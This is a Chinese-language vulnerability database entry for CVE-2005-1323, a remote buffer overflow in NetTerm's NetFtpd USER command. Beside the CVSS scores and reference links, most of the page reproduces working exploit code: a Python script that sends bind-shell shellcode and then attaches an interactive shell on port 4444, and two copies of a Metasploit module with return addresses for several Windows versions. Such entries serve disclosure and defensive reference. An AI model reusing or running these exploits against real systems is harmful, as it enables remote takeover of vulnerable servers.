CVE-2005-1323
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2011-03-07 21:21:37
NMCOEP    

[原文]Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD]Intersoft NetTerm Netftpd USER命令超长参数远程缓冲区溢出漏洞(CNNVD-200505-616)

        Intersoft NetTerm Netftpd是一款小型FTP服务程序,可使用在Microsoft Windows操作系统下。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1323
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1323
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-616
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/20285
(UNKNOWN)  XF  netterm-netftpd-user-bo(20285)
http://www.vupen.com/english/advisories/2005/0407
(UNKNOWN)  VUPEN  ADV-2005-0407
http://www.securityfocus.com/bid/13396
(UNKNOWN)  BID  13396
http://www.securityfocus.com/archive/1/396959
(UNKNOWN)  BUGTRAQ  20050426 ADV: NetTerm's NetFtpd 4.2.2 Buffer Overflow + PoC Exploit
http://www.securenetterm.com/html/what_s_new.html
(UNKNOWN)  CONFIRM  http://www.securenetterm.com/html/what_s_new.html
http://www.osvdb.org/15865
(UNKNOWN)  OSVDB  15865
http://secunia.com/advisories/15140
(UNKNOWN)  SECUNIA  15140

- 漏洞信息

Intersoft NetTerm Netftpd USER命令超长参数远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Intersoft NetTerm Netftpd是一款小型FTP服务程序,可使用在Microsoft Windows操作系统下。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://starbase.neosoft.com/~zkrr01/html/netterm.html

- 漏洞信息 (955)

NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit (EDBID:955)
windows remote
2005-04-26 Verified
21 Sergio Alvarez
N/A [点击下载]
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
	def __init__(self, host, port):
		self.host		= host
		self.port		= port
		self.bsize		= 512
		self.ebpaddr	= 0xcacacaca
		self.retaddr	= 0xdeadbeef
		self.sctype		= 'findskt'
		self.scport		= None

	def setebpaddr(self, addr):
		self.ebpaddr = addr

	def setretaddr(self, addr):
		self.retaddr = addr

	def setbsize(self, size):
		self.bsize = size

	def setsctype(self, type):
		self.sctype = type

	def setscport(self, port):
		self.scport = port

	def genbuffer(self):
		## 
		# Alpha port bind 4444, thanx metasploit
		## 
		sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
		sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
		sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
		sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
		sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
		sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
		sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
		sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
		sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
		sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
		sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
		sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
		sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
		sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
		sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
		sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
		sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
		sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
		sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
		sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
		sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
		sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
		sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
		sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
		sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
		sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
		sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
		sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
		sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
		sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
		sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
		sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
		sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
		sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
		sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
		sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
		sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
		sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
		sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
		sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
		sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
		sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
		sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
		sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
		
		# shellcode
		#sc		=	"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
		#sc		+=	"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
		#sc		+=	"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
		#sc		+=	"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
		#sc		+=	"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
		#sc		+=	"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
		#sc		+=	"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
		#sc		+=	"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
		#sc		+=	"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
		#sc		+=	"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
		#sc		+=	"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
		#sc		+=	"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
		#sc		+=	"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
		#sc		+=	"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
		#sc		+=	"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
		#sc		+=	"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
		#sc		+=	"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
		#sc		+=	"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
		#sc		+=	"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
		#sc		+=	"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
		#sc		+=	"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
		#sc		+=	"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
		#sc		+=	"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
		#sc		+=	"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
		#sc		+=	"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
		# other stuff
		nops	=	"\x41"*(self.bsize-len(sc)-50)
		ebp	=	struct.pack('<L', self.ebpaddr)
		# check if the value is an integer, otherwise it should be a string
		if self.retaddr.__class__.__name__ == 'int':
			ret	=	struct.pack('<L', self.retaddr)
		else:
			ret	=	self.retaddr
		# assemble buffer to send
		buffer	=	"USER "
		buffer	+=	nops
		buffer	+=	sc
		buffer	+=	'\x42'*(50-4)
		buffer	+=	ebp
		buffer	+=	ret
		return buffer

	def exploit(self):
		# connect
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, self.port))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			return None
		print "[+] Connected to %s:%d" % (self.host, self.port)
		# recv banner
		print "[+] Receiving Banner"
		res = skt.recv(100)
		print res
		# send payload
		time.sleep(1)
		print "[+] Sending payload"
		skt.send(self.genbuffer())
		time.sleep(2) # test on mcafee anti-b0f
		skt.close()
		# if successfull connect to the shell
		time.sleep(2)
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, 4444))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			print "[-] Explotation failed\n[-] Daemon should be dead..."
			return None
		print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
		res = skt.recv(1024)
		if res:
			if res.count('Microsoft Windows'):
				print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
				from telnetlib import Telnet
				telnet = Telnet()
				telnet.sock = skt
				try:
					telnet.interact()
				except:
					pass
				skt.close()
				print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
				return None
		skt.close()
		print '[-] Explotation failed\nDaemon should be dead...'

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print "*************************************"
		print "* Coded by Sergio 'shadown' Alvarez *"
		print "*          shadown@gmail.com        *"
		print "*************************************"
		print "Usage: %s host port" % sys.argv[0]
		sys.exit(1)

	exp = warftpd(sys.argv[1], int(sys.argv[2]))
	exp.setsctype('findskt')
	exp.setscport(1234)
	exp.setbsize(1014)
	exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
	exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
	exp.exploit()

# milw0rm.com [2005-04-26]
		

- 漏洞信息 (16735)

NetTerm NetFTPD USER Buffer Overflow (EDBID:16735)
windows remote
2010-10-05 Verified
0 metasploit
N/A [点击下载]
##
# $Id: netterm_netftpd_user.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetTerm NetFTPD USER Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the NetTerm NetFTPD
				application. This package is part of the NetTerm package.
				This module uses the USER command to trigger the overflow.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'References'     =>
				[
					[ 'CVE', '2005-1323'],
					[ 'OSVDB', '15865'],
					[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
					[ 'BID', '13396'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x20\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => [ 'win' ],
			'Targets'        =>
				[
					[
						'NetTerm NetFTPD Universal',  # Tested OK - hdm 11/24/2005
						{
							'Ret'      => 0x0040df98, # netftpd.exe (multiple versions)
						},
					],
					[
						'Windows 2000 English',
						{
							'Ret'      => 0x75022ac4, # ws2help.dll
						},
					],
					[
						'Windows XP English SP0/SP1',
						{
							'Ret'      => 0x71aa32ad, # ws2help.dll
						},
					],
					[
						'Windows 2003 English',
						{
							'Ret'      => 0x7ffc0638, # peb magic :-)
						},
					],
					[
						'Windows NT 4.0 SP4/SP5/SP6',
						{
							'Ret'      => 0x77681799, # ws2help.dll
						},
					],
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect
		if (banner =~ /NetTerm FTP server/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		# U          push ebp
		# S          push ebx
		# E          inc ebp
		# R          push edx
		# \x20\xC0   and al, al

		buf          = rand_text_english(8192, payload_badchars)
		buf[0, 1]    = "\xc0"
		buf[1, payload.encoded.length] = payload.encoded
		buf[1014, 4] = [ target.ret ].pack('V')

		send_cmd( ["USER #{buf}"] )
		send_cmd( ['HELP'] )

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83000)

NetTerm NetFTPD USER Buffer Overflow (PacketStormID:F83000)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2005-1323
[点击下载]

This Metasploit module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This Metasploit module uses the USER command to trigger the overflow.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'NetTerm NetFTPD USER Buffer Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the NetTerm NetFTPD
				application. This package is part of the NetTerm package.
				This module uses the USER command to trigger the overflow.				
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1323'],
					[ 'OSVDB', '15865'],
					[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
					[ 'BID', '13396'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x20\x0d",
					'StackAdjustment' => -3500,

				},

			'Targets'        => 
				[
					[ 
						'NetTerm NetFTPD Universal',  # Tested OK - hdm 11/24/2005
						{
							'Platform' => 'win',
							'Ret'      => 0x0040df98, # netftpd.exe (multiple versions)
						},
					],
					[ 
						'Windows 2000 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4, # ws2help.dll
						},
					],
					[ 
						'Windows XP English SP0/SP1',
						{
							'Platform' => 'win',
							'Ret'      => 0x71aa32ad, # ws2help.dll
						},
					],
					[ 
						'Windows 2003 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x7ffc0638, # peb magic :-)
						},
					],
					[ 
						'Windows NT 4.0 SP4/SP5/SP6',
						{
							'Platform' => 'win',
							'Ret'      => 0x77681799, # ws2help.dll
						},
					],															
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect	
		if (banner =~ /NetTerm FTP server/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		print_status("Trying target #{target.name}...")

		# U          push ebp
		# S          push ebx
		# E          inc ebp
		# R          push edx
		# \x20\xC0   and al, al

		buf          = rand_text_english(8192, payload_badchars)
		buf[0, 1]    = "\xc0"
		buf[1, payload.encoded.length] = payload.encoded
		buf[1014, 4] = [ target.ret ].pack('V')
		
		send_cmd( ["USER #{buf}"] )
		send_cmd( ['HELP'] )
		
		handler
		disconnect
	end

end
    

- 漏洞信息

15865
NetTerm NetFtpd USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in NetTerm NetFtpd. NetFtpd fails to handle overly long input to the USER command resulting in a buffer overflow. With a specially crafted request, a remote attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2005-04-26 2005-04-21
2005-04-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. According to the vendor, NetFtpd has been removed from NetTerm.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站